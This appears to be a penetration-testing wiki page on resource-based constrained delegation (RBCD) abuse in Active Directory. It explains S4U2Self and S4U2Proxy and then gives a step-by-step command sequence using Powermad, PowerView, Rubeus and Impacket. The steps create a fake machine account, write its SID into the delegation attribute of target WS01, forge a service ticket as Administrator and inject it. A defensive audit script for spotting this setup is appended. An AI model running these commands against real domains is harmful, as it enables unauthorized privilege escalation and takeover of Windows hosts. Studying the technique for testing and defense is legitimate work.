
# RBCD

## <mark style="color:$primary;">ABOUT</mark>

<mark style="color:red;">**RBCD**</mark> is a <mark style="color:purple;">**Windows Active Directory mechanism**</mark> where a computer object specifies which accounts are allowed to impersonate users to it, for constrained **(limited)** network-based delegation using Kerberos.

> Attackers exploit it by inserting themselves into that trust list and impersonating any user.

<mark style="color:yellow;">**"Resource-Based"**</mark> means the permission is set on the target machine, not on the impersonating account.

<mark style="color:yellow;">**"Constrained"**</mark> means the impersonation is limited to specific services, like SMB or LDAP, not all services.

<mark style="color:yellow;">**"Delegation"**</mark> means one account can act as another user across the network, not just locally.

RBCD allows a computer or service account to say, <mark style="color:orange;">**"this other account is allowed to act as any user when connecting to me."**</mark> Attackers abuse it by **creating their own computer account**, then **writing their own SID into the delegation attribute** on a target machine. After that, they can impersonate any domain user, like Administrator, to that target.

> So basically it is a crippled version of full impersonation, which is good considering the rule of least privilege.

{% hint style="info" %}

### Example of Implementation

A user logs into a web application using a standard web form. The web server needs to query a backend SQL database as that user, but does not have the user's password.

**S4U2Self** allows the web server to forge a Kerberos ticket for the user to itself.

**S4U2Proxy** allows the web server to exchange that forged self-ticket for a valid service ticket to the SQL database.
{% endhint %}

## <mark style="color:$primary;">S4U2Self + S4U2Proxy</mark>

<mark style="color:red;">**S4U2Self**</mark> and <mark style="color:red;">**S4U2Proxy**</mark> are <mark style="color:purple;">**Kerberos protocol extensions**</mark>, not standalone attack techniques.

They were designed by Microsoft as part of **Service-for-User (S4U)** functionality to support **constrained delegation**. Their purpose is to let services act on behalf of users under strict control.

#### <mark style="color:green;">**S4U2Self**</mark> = <mark style="color:yellow;">**"Service For User To Self"**</mark>

Lets a service request a ticket for any user to itself, without needing the user's password.

*"Give me a <mark style="color:$warning;">**SERVICE**</mark> ticket <mark style="color:$warning;">**FOR**</mark> another <mark style="color:$warning;">**USER**</mark> so I can use it <mark style="color:$warning;">**TO**</mark> my<mark style="color:$warning;">**SELF**</mark>"*

#### <mark style="color:green;">**S4U2Proxy**</mark> = <mark style="color:yellow;">**"Service For User To Proxy"**</mark>

Lets the service use that ticket to request a second ticket to another service, completing delegation.

*"Take this <mark style="color:$warning;">**SERVICE**</mark> ticket <mark style="color:$warning;">**from**</mark> this <mark style="color:$warning;">**USER**</mark> I just got, and let me use it <mark style="color:$warning;">**TO PROXY**</mark> this user's access to that other service"*

## <mark style="color:$primary;">REQUIREMENTS</mark>

| Element               | Value                               |
| --------------------- | ----------------------------------- |
| Domain User           | Administrator@militech.local        |
| Fake Machine Account  | FAKE01$                             |
| Fake Machine Password | 123456                              |
| Fake Machine SID      | *To be retrieved during attack*     |
| Target Machine        | WS01                                |
| Target Admin          | Administrator                       |
| Domain Controller     | DC01                                |
| Delegation Permission | Write access to WS01 RBCD attribute |

## <mark style="color:$primary;">FLOW</mark>

1. Create a fake machine account (<mark style="color:green;">**FAKE01$**</mark>), if <mark style="color:green;">`MachineAccountQuota`</mark> allows it.
2. Add <mark style="color:green;">**FAKE01$**</mark> SID to the <mark style="color:green;">**`msDS-AllowedToActOnBehalfOfOtherIdentity`**</mark> attribute on the target machine **WS01**, granting delegation rights.
3. Authenticate as <mark style="color:green;">**FAKE01$**</mark> and request a Kerberos ticket as Administrator to <mark style="color:green;">**FAKE01**</mark> (<mark style="color:red;">**S4U2Self**</mark>).
4. Use that ticket to request a second ticket as Administrator to **WS01** (<mark style="color:red;">**S4U2Proxy**</mark>).
5. Receive a valid service ticket for Administrator to **WS01** and use it to access **WS01** as Administrator, achieving privilege escalation.

{% hint style="info" %}
It's not necessary to create a fake account; sometimes it's better to grant delegation rights to a machine account we already control, or to skip this step entirely if that account already has them. The possibilities are vast; the only thing you need to understand is which components the attack needs.
{% endhint %}

## <mark style="color:$primary;">WINDOWS</mark>

#### 1. Creating Machine Object

> For this we need PowerMAD script [**\[LINK\]**](https://github.com/Kevin-Robertson/Powermad)

```powershell
PS C:\> New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
```

#### Checking Object + Taking its SID

```powershell
# Get-DomainComputer is a PowerView cmdlet; note the objectsid value for the next step
PS C:\> Get-DomainComputer fake01
```

#### 2. Creating Security Descriptor for FAKE01

```powershell
# SDDL: owner BA (Builtin Administrators), one allow ACE granting full rights to FAKE01$'s SID (taken from the previous step)
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2552734371-813931464-1050690807-1154)"
# Serialize the descriptor to the byte[] form the LDAP attribute expects
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
```

#### 3. Adding Descriptor bytes into WS01 (Service Machine)

```powershell
Get-DomainComputer ws01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
```

#### Checking Descriptor

```powershell
# Read the attribute back from WS01 and decode it; the DACL should show the ACE for FAKE01$'s SID
PS C:\> $RawBytes = (Get-DomainComputer ws01 -Properties 'msds-allowedtoactonbehalfofotheridentity').'msds-allowedtoactonbehalfofotheridentity'
PS C:\> (New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl
```

#### 4. Generating RC4 Hash for FAKE01

```powershell
.\Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:militech.local
```

#### 5. Impersonating

```powershell
# /rc4 is the hash produced in step 4 (placeholder value shown); /ptt injects the resulting ticket into the current session
.\Rubeus.exe s4u /user:fake01$ /rc4:3SAOIDFHOQWEB1O82G3O123KBSND /impersonateuser:Administrator /msdsspn:cifs/ws01.militech.local /ptt
```

#### Base64 Ticket to Ccache ticket

```bash
# Rubeus prints the ticket as base64; decode it to a .kirbi and convert to a ccache for Impacket tooling
base64 -d ticket_base64.txt > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=/home/v17/tickets/ticket.ccache
klist
```
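Defensive audit for the components the flow relies on, as an added example that is not part of these notes: it reads `ms-DS-MachineAccountQuota` (what step 1 depends on), flags recently created computer objects, and decodes `msDS-AllowedToActOnBehalfOfOtherIdentity` on every computer that has it set (what step 2 writes). It assumes the RSAT ActiveDirectory module on a domain-joined host; the 7-day window and the `Set-ADComputer` remediation line are this example's choices.

```powershell
# Added audit script (not from the original notes); requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# Step 1 of the flow needs ms-DS-MachineAccountQuota > 0 (default 10). Setting it to 0
# stops ordinary users from creating FAKE01$-style accounts.
$domain = Get-ADDomain
$quota  = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Output "ms-DS-MachineAccountQuota = $quota"

# Computer objects created in the last 7 days (window chosen for this example): a fresh
# machine account that also shows up in an RBCD descriptor below is the pattern from the flow.
$recent = Get-ADComputer -Filter * -Properties whenCreated |
    Where-Object { $_.whenCreated -gt (Get-Date).AddDays(-7) }
$recent | ForEach-Object { Write-Output ("Recent computer: {0} ({1})" -f $_.SamAccountName, $_.whenCreated) }

# Step 2 writes msDS-AllowedToActOnBehalfOfOtherIdentity; list every computer where it is set.
$targets = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
    -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity'

foreach ($t in $targets) {
    $sd = $t.'msDS-AllowedToActOnBehalfOfOtherIdentity'
    # The AD module normally returns an ActiveDirectorySecurity object; decode raw bytes too.
    if ($sd -is [byte[]]) {
        $tmp = New-Object System.DirectoryServices.ActiveDirectorySecurity
        $tmp.SetSecurityDescriptorBinaryForm($sd)
        $sd = $tmp
    }
    Write-Output "$($t.SamAccountName) trusts for delegation:"
    # Enumerate the DACL as SIDs, then resolve each to an account name where possible.
    foreach ($ace in $sd.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier])) {
        $sid  = $ace.IdentityReference
        $name = '<unresolved SID>'
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch {}
        $flag = if ($recent.SID.Value -contains $sid.Value) { ' <-- recently created account' } else { '' }
        Write-Output ("  {0}  {1}  {2}{3}" -f $sid.Value, $ace.ActiveDirectoryRights, $name, $flag)
    }
}

# Remediation for a computer that should trust nobody (clears the attribute entirely):
# Set-ADComputer -Identity WS01 -PrincipalsAllowedToDelegateToAccount $null
```

An unresolved SID in the output means the trusted account no longer exists, which is itself worth cleaning up.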

## <mark style="color:$primary;">RESOURCES</mark>

{% embed url="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#creating-a-new-computer-object" %}
